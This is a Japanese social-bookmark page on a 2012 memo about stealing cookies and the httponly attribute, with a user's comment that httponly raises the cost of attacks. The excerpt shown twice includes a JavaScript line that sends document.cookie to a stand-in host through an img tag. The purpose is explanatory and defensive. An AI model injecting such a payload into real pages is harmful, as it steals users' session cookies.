サクサク読めて、アプリ限定の機能も多数!
document.cookieが使えないって事。“他の脆弱性があると、Ajaxコードを挿入することで、httponlyなcookieも盗み取れる場合はあるが、httponlyなcookieにすることで攻撃の手間は増えるのでやらないよりよい。”
tohokuaiki のブックマーク 2020/07/25 18:11
Cookieを盗む例とhttponly属性 at softelメモ[cookie][javascript]document.cookieが使えないって事。“他の脆弱性があると、Ajaxコードを挿入することで、httponlyなcookieも盗み取れる場合はあるが、httponlyなcookieにすることで攻撃の手間は増えるのでやらないよりよい。”2020/07/25 18:11
このブックマークにはスターがありません。 最初のスターをつけてみよう!
www.softel.co.jp2012/06/22
以下は、とても単純なJavascriptによる例。 document.write('<img src="http://example.com/?x=' +escape(document.cookie) + '">'); example.com に対してGET渡しでdocument.cookieが送信される。 取得されたcoo...
18 人がブックマーク・2 件のコメント
\ コメントが サクサク読める アプリです /
document.cookieが使えないって事。“他の脆弱性があると、Ajaxコードを挿入することで、httponlyなcookieも盗み取れる場合はあるが、httponlyなcookieにすることで攻撃の手間は増えるのでやらないよりよい。”
このブックマークにはスターがありません。
最初のスターをつけてみよう!
Cookieを盗む例とhttponly属性 at softelメモ
以下は、とても単純なJavascriptによる例。 document.write('<img src="http://example.com/?x=' +escape(document.cookie) + '">'); example.com に対してGET渡しでdocument.cookieが送信される。 取得されたcoo...
18 人がブックマーク・2 件のコメント
\ コメントが サクサク読める アプリです /